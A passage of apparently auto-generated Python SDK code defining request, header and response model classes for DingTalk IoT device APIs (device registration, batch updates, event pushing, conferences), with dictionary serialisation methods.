        return self
class BatchDeleteDeviceResponse(TeaModel):
    """Full BatchDeleteDevice response: HTTP headers plus parsed body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: BatchDeleteDeviceResponseBody = None,
    ):
        # Response HTTP headers.
        self.headers = headers
        # Parsed response body model.
        self.body = body
    def validate(self):
        """Require headers and body, then validate the body recursively."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = BatchDeleteDeviceResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
class PushEventHeaders(TeaModel):
    """Request headers for the PushEvent API (auto-generated model)."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        # Additional common headers to send with the request.
        self.common_headers = common_headers
        # DingTalk access token, sent as 'x-acs-dingtalk-access-token'.
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class PushEventRequest(TeaModel):
    """Request body for the PushEvent API (auto-generated model)."""
    def __init__(
        self,
        corp_id: str = None,
        event_id: str = None,
        event_type: str = None,
        event_name: str = None,
        occurrence_time: int = None,
        device_id: str = None,
        location: str = None,
        msg: str = None,
        pic_urls: List[str] = None,
        extra_data: Dict[str, Any] = None,
    ):
        # DingTalk IoT organization ID; required for third-party platforms,
        # ignored for in-house enterprise systems.
        self.corp_id = corp_id
        # Event ID.
        self.event_id = event_id
        # Event type, at most 20 characters.
        self.event_type = event_type
        # Event name, 4-20 characters; a Chinese character counts as 2.
        self.event_name = event_name
        # Time the event occurred, Unix timestamp in milliseconds.
        self.occurrence_time = occurrence_time
        # ID of the device that triggered the event.
        self.device_id = device_id
        # Location where the event occurred.
        self.location = location
        # Event text message.
        self.msg = msg
        # List of event picture URLs.
        self.pic_urls = pic_urls
        # Custom parameters for third-party platforms; ignored for
        # in-house enterprise systems.
        self.extra_data = extra_data
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.corp_id is not None:
            result['corpId'] = self.corp_id
        if self.event_id is not None:
            result['eventId'] = self.event_id
        if self.event_type is not None:
            result['eventType'] = self.event_type
        if self.event_name is not None:
            result['eventName'] = self.event_name
        if self.occurrence_time is not None:
            result['occurrenceTime'] = self.occurrence_time
        if self.device_id is not None:
            result['deviceId'] = self.device_id
        if self.location is not None:
            result['location'] = self.location
        if self.msg is not None:
            result['msg'] = self.msg
        if self.pic_urls is not None:
            result['picUrls'] = self.pic_urls
        if self.extra_data is not None:
            result['extraData'] = self.extra_data
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('corpId') is not None:
            self.corp_id = m.get('corpId')
        if m.get('eventId') is not None:
            self.event_id = m.get('eventId')
        if m.get('eventType') is not None:
            self.event_type = m.get('eventType')
        if m.get('eventName') is not None:
            self.event_name = m.get('eventName')
        if m.get('occurrenceTime') is not None:
            self.occurrence_time = m.get('occurrenceTime')
        if m.get('deviceId') is not None:
            self.device_id = m.get('deviceId')
        if m.get('location') is not None:
            self.location = m.get('location')
        if m.get('msg') is not None:
            self.msg = m.get('msg')
        if m.get('picUrls') is not None:
            self.pic_urls = m.get('picUrls')
        if m.get('extraData') is not None:
            self.extra_data = m.get('extraData')
        return self
class PushEventResponseBody(TeaModel):
    """Response body for the PushEvent API (auto-generated model)."""
    def __init__(
        self,
        event_id: str = None,
    ):
        # Event ID.
        self.event_id = event_id
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.event_id is not None:
            result['eventId'] = self.event_id
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('eventId') is not None:
            self.event_id = m.get('eventId')
        return self
class PushEventResponse(TeaModel):
    """Full PushEvent response: HTTP headers plus parsed body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: PushEventResponseBody = None,
    ):
        # Response HTTP headers.
        self.headers = headers
        # Parsed response body model.
        self.body = body
    def validate(self):
        """Require headers and body, then validate the body recursively."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = PushEventResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
class DeviceConferenceHeaders(TeaModel):
    """Request headers for the DeviceConference API (auto-generated model)."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        # Additional common headers to send with the request.
        self.common_headers = common_headers
        # DingTalk access token, sent as 'x-acs-dingtalk-access-token'.
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class DeviceConferenceRequest(TeaModel):
    """Request body for the DeviceConference API (auto-generated model)."""
    def __init__(
        self,
        conf_title: str = None,
        conference_id: str = None,
        conference_password: str = None,
        device_ids: List[str] = None,
    ):
        # Conference title, at most 20 Chinese characters.
        self.conf_title = conf_title
        # DingTalk conference ID; required when joining an existing conference.
        self.conference_id = conference_id
        # DingTalk conference password; required when joining an existing
        # conference.
        self.conference_password = conference_password
        # Device IDs to invite, at most 5.
        self.device_ids = device_ids
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.conf_title is not None:
            result['confTitle'] = self.conf_title
        if self.conference_id is not None:
            result['conferenceId'] = self.conference_id
        if self.conference_password is not None:
            result['conferencePassword'] = self.conference_password
        if self.device_ids is not None:
            result['deviceIds'] = self.device_ids
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('confTitle') is not None:
            self.conf_title = m.get('confTitle')
        if m.get('conferenceId') is not None:
            self.conference_id = m.get('conferenceId')
        if m.get('conferencePassword') is not None:
            self.conference_password = m.get('conferencePassword')
        if m.get('deviceIds') is not None:
            self.device_ids = m.get('deviceIds')
        return self
class DeviceConferenceResponseBody(TeaModel):
    """Response body for the DeviceConference API (auto-generated model)."""
    def __init__(
        self,
        conference_id: str = None,
    ):
        # Conference ID.
        self.conference_id = conference_id
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.conference_id is not None:
            result['conferenceId'] = self.conference_id
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('conferenceId') is not None:
            self.conference_id = m.get('conferenceId')
        return self
class DeviceConferenceResponse(TeaModel):
    """Full DeviceConference response: HTTP headers plus parsed body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: DeviceConferenceResponseBody = None,
    ):
        # Response HTTP headers.
        self.headers = headers
        # Parsed response body model.
        self.body = body
    def validate(self):
        """Require headers and body, then validate the body recursively."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = DeviceConferenceResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
class RegisterDeviceHeaders(TeaModel):
    """Request headers for the RegisterDevice API (auto-generated model)."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        # Additional common headers to send with the request.
        self.common_headers = common_headers
        # DingTalk access token, sent as 'x-acs-dingtalk-access-token'.
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class RegisterDeviceRequest(TeaModel):
    """Request body for the RegisterDevice API (auto-generated model)."""
    def __init__(
        self,
        corp_id: str = None,
        id: str = None,
        device_name: str = None,
        nick_name: str = None,
        location: str = None,
        device_status: int = None,
        device_type: str = None,
        device_type_name: str = None,
        parent_id: str = None,
        product_type: str = None,
        live_url: str = None,
    ):
        # DingTalk organization ID.
        self.corp_id = corp_id
        # Device ID.
        self.id = id
        # Device name.
        self.device_name = device_name
        # Device nickname.
        self.nick_name = nick_name
        # Device location.
        self.location = location
        # Device status: 0 = online, 1 = offline.
        self.device_status = device_status
        # Device type.
        self.device_type = device_type
        # Device type name.
        self.device_type_name = device_type_name
        # Parent device node ID.
        self.parent_id = parent_id
        # Product type: CAMERA for cameras, OTHERS otherwise.
        self.product_type = product_type
        # Live video stream URL.
        self.live_url = live_url
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.corp_id is not None:
            result['corpId'] = self.corp_id
        if self.id is not None:
            result['id'] = self.id
        if self.device_name is not None:
            result['deviceName'] = self.device_name
        if self.nick_name is not None:
            result['nickName'] = self.nick_name
        if self.location is not None:
            result['location'] = self.location
        if self.device_status is not None:
            result['deviceStatus'] = self.device_status
        if self.device_type is not None:
            result['deviceType'] = self.device_type
        if self.device_type_name is not None:
            result['deviceTypeName'] = self.device_type_name
        if self.parent_id is not None:
            result['parentId'] = self.parent_id
        if self.product_type is not None:
            result['productType'] = self.product_type
        if self.live_url is not None:
            result['liveUrl'] = self.live_url
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('corpId') is not None:
            self.corp_id = m.get('corpId')
        if m.get('id') is not None:
            self.id = m.get('id')
        if m.get('deviceName') is not None:
            self.device_name = m.get('deviceName')
        if m.get('nickName') is not None:
            self.nick_name = m.get('nickName')
        if m.get('location') is not None:
            self.location = m.get('location')
        if m.get('deviceStatus') is not None:
            self.device_status = m.get('deviceStatus')
        if m.get('deviceType') is not None:
            self.device_type = m.get('deviceType')
        if m.get('deviceTypeName') is not None:
            self.device_type_name = m.get('deviceTypeName')
        if m.get('parentId') is not None:
            self.parent_id = m.get('parentId')
        if m.get('productType') is not None:
            self.product_type = m.get('productType')
        if m.get('liveUrl') is not None:
            self.live_url = m.get('liveUrl')
        return self
class RegisterDeviceResponseBody(TeaModel):
    """Response body for the RegisterDevice API (auto-generated model)."""
    def __init__(
        self,
        device_id: str = None,
    ):
        # Device ID.
        self.device_id = device_id
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.device_id is not None:
            result['deviceId'] = self.device_id
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('deviceId') is not None:
            self.device_id = m.get('deviceId')
        return self
class RegisterDeviceResponse(TeaModel):
    """Full RegisterDevice response: HTTP headers plus parsed body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: RegisterDeviceResponseBody = None,
    ):
        # Response HTTP headers.
        self.headers = headers
        # Parsed response body model.
        self.body = body
    def validate(self):
        """Require headers and body, then validate the body recursively."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = RegisterDeviceResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
class BatchRegisterDeviceHeaders(TeaModel):
    """Request headers for the BatchRegisterDevice API (auto-generated model)."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        # Additional common headers to send with the request.
        self.common_headers = common_headers
        # DingTalk access token, sent as 'x-acs-dingtalk-access-token'.
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class BatchRegisterDeviceRequestDevices(TeaModel):
    """One device entry in a BatchRegisterDevice request (auto-generated model)."""
    def __init__(
        self,
        device_id: str = None,
        device_name: str = None,
        device_status: int = None,
        device_type: str = None,
        device_type_name: str = None,
        product_type: str = None,
        live_url: str = None,
        parent_id: str = None,
        location: str = None,
        extra_data: Dict[str, Any] = None,
    ):
        # Device ID.
        self.device_id = device_id
        # Device name.
        self.device_name = device_name
        # Device status: 0 = online, 1 = offline.
        self.device_status = device_status
        # Device type, caller-defined, at most 128 bytes.
        self.device_type = device_type
        # Device type name, caller-defined, at most 128 bytes,
        # one-to-one with deviceType.
        self.device_type_name = device_type_name
        # Product type: CAMERA (camera, live view available) or
        # OTHERS (non-camera).
        self.product_type = product_type
        # Live stream URL; supports rtmp, flv, hls and similar formats,
        # must use the HTTPS protocol.
        self.live_url = live_url
        # Parent device ID.
        self.parent_id = parent_id
        # Device location.
        self.location = location
        # Custom parameters for third-party platforms; ignored for
        # in-house enterprise systems.
        self.extra_data = extra_data
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.device_id is not None:
            result['deviceId'] = self.device_id
        if self.device_name is not None:
            result['deviceName'] = self.device_name
        if self.device_status is not None:
            result['deviceStatus'] = self.device_status
        if self.device_type is not None:
            result['deviceType'] = self.device_type
        if self.device_type_name is not None:
            result['deviceTypeName'] = self.device_type_name
        if self.product_type is not None:
            result['productType'] = self.product_type
        if self.live_url is not None:
            result['liveUrl'] = self.live_url
        if self.parent_id is not None:
            result['parentId'] = self.parent_id
        if self.location is not None:
            result['location'] = self.location
        if self.extra_data is not None:
            result['extraData'] = self.extra_data
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('deviceId') is not None:
            self.device_id = m.get('deviceId')
        if m.get('deviceName') is not None:
            self.device_name = m.get('deviceName')
        if m.get('deviceStatus') is not None:
            self.device_status = m.get('deviceStatus')
        if m.get('deviceType') is not None:
            self.device_type = m.get('deviceType')
        if m.get('deviceTypeName') is not None:
            self.device_type_name = m.get('deviceTypeName')
        if m.get('productType') is not None:
            self.product_type = m.get('productType')
        if m.get('liveUrl') is not None:
            self.live_url = m.get('liveUrl')
        if m.get('parentId') is not None:
            self.parent_id = m.get('parentId')
        if m.get('location') is not None:
            self.location = m.get('location')
        if m.get('extraData') is not None:
            self.extra_data = m.get('extraData')
        return self
class BatchRegisterDeviceRequest(TeaModel):
    """Request body for the BatchRegisterDevice API (auto-generated model)."""
    def __init__(
        self,
        corp_id: str = None,
        devices: List[BatchRegisterDeviceRequestDevices] = None,
    ):
        # DingTalk IoT organization ID; required for third-party platforms,
        # ignored for in-house enterprise systems.
        self.corp_id = corp_id
        # Device list.
        self.devices = devices
    def validate(self):
        """Recursively validate each device entry, if any."""
        if self.devices:
            for k in self.devices:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.corp_id is not None:
            result['corpId'] = self.corp_id
        # NOTE(review): 'devices' is emitted as [] even when self.devices is
        # None, unlike the other optional fields — generator quirk, kept as-is.
        result['devices'] = []
        if self.devices is not None:
            for k in self.devices:
                result['devices'].append(k.to_map() if k else None)
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('corpId') is not None:
            self.corp_id = m.get('corpId')
        # Always reset the list before repopulating from the map.
        self.devices = []
        if m.get('devices') is not None:
            for k in m.get('devices'):
                temp_model = BatchRegisterDeviceRequestDevices()
                self.devices.append(temp_model.from_map(k))
        return self
class BatchRegisterDeviceResponseBody(TeaModel):
    """Response body for the BatchRegisterDevice API (auto-generated model)."""
    def __init__(
        self,
        device_ids: List[str] = None,
    ):
        # IDs of the devices that registered successfully.
        self.device_ids = device_ids
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.device_ids is not None:
            result['deviceIds'] = self.device_ids
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('deviceIds') is not None:
            self.device_ids = m.get('deviceIds')
        return self
class BatchRegisterDeviceResponse(TeaModel):
    """Full BatchRegisterDevice response: HTTP headers plus parsed body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: BatchRegisterDeviceResponseBody = None,
    ):
        # Response HTTP headers.
        self.headers = headers
        # Parsed response body model.
        self.body = body
    def validate(self):
        """Require headers and body, then validate the body recursively."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.headers is not None:
            result['headers'] = self.headers
        if self.body is not None:
            result['body'] = self.body.to_map()
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            temp_model = BatchRegisterDeviceResponseBody()
            self.body = temp_model.from_map(m['body'])
        return self
class BatchRegisterEventTypeHeaders(TeaModel):
    """Request headers: common headers plus the DingTalk access token."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        if self.common_headers is not None:
            data['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            data['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        common = m.get('commonHeaders')
        if common is not None:
            self.common_headers = common
        token = m.get('x-acs-dingtalk-access-token')
        if token is not None:
            self.x_acs_dingtalk_access_token = token
        return self
class BatchRegisterEventTypeRequestEventTypes(TeaModel):
    """A single event-type entry: unique key plus display name."""
    def __init__(
        self,
        event_type: str = None,
        event_type_name: str = None,
    ):
        # Unique event type key, at most 20 characters.
        self.event_type = event_type
        # Display name, 4-20 characters; one CJK character counts as 2.
        self.event_type_name = event_type_name

    def validate(self):
        pass

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        if self.event_type is not None:
            data['eventType'] = self.event_type
        if self.event_type_name is not None:
            data['eventTypeName'] = self.event_type_name
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        value = m.get('eventType')
        if value is not None:
            self.event_type = value
        value = m.get('eventTypeName')
        if value is not None:
            self.event_type_name = value
        return self
class BatchRegisterEventTypeRequest(TeaModel):
    """Request payload for registering a batch of event types."""
    def __init__(
        self,
        corp_id: str = None,
        event_types: List[BatchRegisterEventTypeRequestEventTypes] = None,
    ):
        # DingTalk IoT corp ID; required for third-party platforms,
        # ignored for in-house systems.
        self.corp_id = corp_id
        # Event types to register; at most 500 entries.
        self.event_types = event_types

    def validate(self):
        """Recursively validate each event-type entry, skipping falsy items."""
        for entry in self.event_types or []:
            if entry:
                entry.validate()

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        if self.corp_id is not None:
            data['corpId'] = self.corp_id
        data['eventTypes'] = []
        if self.event_types is not None:
            for entry in self.event_types:
                data['eventTypes'].append(entry.to_map() if entry else None)
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        corp_id = m.get('corpId')
        if corp_id is not None:
            self.corp_id = corp_id
        self.event_types = []
        if m.get('eventTypes') is not None:
            for raw in m.get('eventTypes'):
                self.event_types.append(
                    BatchRegisterEventTypeRequestEventTypes().from_map(raw))
        return self
class BatchRegisterEventTypeResponseBody(TeaModel):
    """Response body: event types that were registered successfully."""
    def __init__(
        self,
        event_types: List[str] = None,
    ):
        # Successfully registered event types.
        self.event_types = event_types

    def validate(self):
        pass

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        if self.event_types is not None:
            data['eventTypes'] = self.event_types
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        types = m.get('eventTypes')
        if types is not None:
            self.event_types = types
        return self
class BatchRegisterEventTypeResponse(TeaModel):
    """Wrapper pairing response headers with the parsed response body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: BatchRegisterEventTypeResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        """Require headers and body, then validate the body recursively."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        if self.headers is not None:
            data['headers'] = self.headers
        if self.body is not None:
            data['body'] = self.body.to_map()
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        if m.get('headers') is not None:
            self.headers = m.get('headers')
        if m.get('body') is not None:
            self.body = BatchRegisterEventTypeResponseBody().from_map(m['body'])
        return self
class BatchUpdateDeviceHeaders(TeaModel):
    """Request headers: common headers plus the DingTalk access token."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        self.common_headers = common_headers
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token

    def validate(self):
        pass

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        if self.common_headers is not None:
            data['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            data['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        common = m.get('commonHeaders')
        if common is not None:
            self.common_headers = common
        token = m.get('x-acs-dingtalk-access-token')
        if token is not None:
            self.x_acs_dingtalk_access_token = token
        return self
class BatchUpdateDeviceRequestDevices(TeaModel):
    """A single device entry for a batch update request."""
    def __init__(
        self,
        device_id: str = None,
        device_name: str = None,
        location: str = None,
        device_status: int = None,
        live_url: str = None,
        extra_data: Dict[str, Any] = None,
    ):
        # Device ID.
        self.device_id = device_id
        # Device name.
        self.device_name = device_name
        # Device address.
        self.location = location
        # Device status: 0 = online, 1 = offline.
        self.device_status = device_status
        # Live stream URL (rtmp/flv/hls supported; HTTPS required).
        self.live_url = live_url
        # Third-party platform custom parameters; ignored for in-house systems.
        self.extra_data = extra_data

    def validate(self):
        pass

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        # Emit keys in declaration order, skipping unset fields.
        for key, value in (
            ('deviceId', self.device_id),
            ('deviceName', self.device_name),
            ('location', self.location),
            ('deviceStatus', self.device_status),
            ('liveUrl', self.live_url),
            ('extraData', self.extra_data),
        ):
            if value is not None:
                data[key] = value
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        for key, attr in (
            ('deviceId', 'device_id'),
            ('deviceName', 'device_name'),
            ('location', 'location'),
            ('deviceStatus', 'device_status'),
            ('liveUrl', 'live_url'),
            ('extraData', 'extra_data'),
        ):
            value = m.get(key)
            if value is not None:
                setattr(self, attr, value)
        return self
class BatchUpdateDeviceRequest(TeaModel):
    """Request payload for updating a batch of IoT devices."""
    def __init__(
        self,
        corp_id: str = None,
        devices: List[BatchUpdateDeviceRequestDevices] = None,
    ):
        # DingTalk IoT corp ID; required for third-party platforms,
        # ignored for in-house systems.
        self.corp_id = corp_id
        # Devices to update.
        self.devices = devices

    def validate(self):
        """Recursively validate each device entry, skipping falsy items."""
        for device in self.devices or []:
            if device:
                device.validate()

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        if self.corp_id is not None:
            data['corpId'] = self.corp_id
        data['devices'] = []
        if self.devices is not None:
            for device in self.devices:
                data['devices'].append(device.to_map() if device else None)
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        corp_id = m.get('corpId')
        if corp_id is not None:
            self.corp_id = corp_id
        self.devices = []
        if m.get('devices') is not None:
            for entry in m.get('devices'):
                self.devices.append(BatchUpdateDeviceRequestDevices().from_map(entry))
        return self
class BatchUpdateDeviceResponseBody(TeaModel):
    """Response body: IDs of the devices that were updated successfully."""
    def __init__(
        self,
        device_ids: List[str] = None,
    ):
        # IDs of successfully updated devices.
        self.device_ids = device_ids

    def validate(self):
        pass

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
        if base is not None:
            return base
        data = {}
        if self.device_ids is not None:
            data['deviceIds'] = self.device_ids
        return data

    def from_map(self, m: dict = None):
        """Populate fields from a dict and return self."""
        m = m or {}
        ids = m.get('deviceIds')
        if ids is not None:
            self.device_ids = ids
        return self
class BatchUpdateDeviceResponse(TeaModel):
    """Wrapper pairing response headers with the parsed response body."""
    def __init__(
        self,
        headers: Dict[str, str] = None,
        body: BatchUpdateDeviceResponseBody = None,
    ):
        self.headers = headers
        self.body = body

    def validate(self):
        """Require headers and body, then validate the body recursively."""
        self.validate_required(self.headers, 'headers')
        self.validate_required(self.body, 'body')
        if self.body:
            self.body.validate()

    def to_map(self):
        """Serialize to a plain dict; honor any map provided by the base class."""
        base = super().to_map()
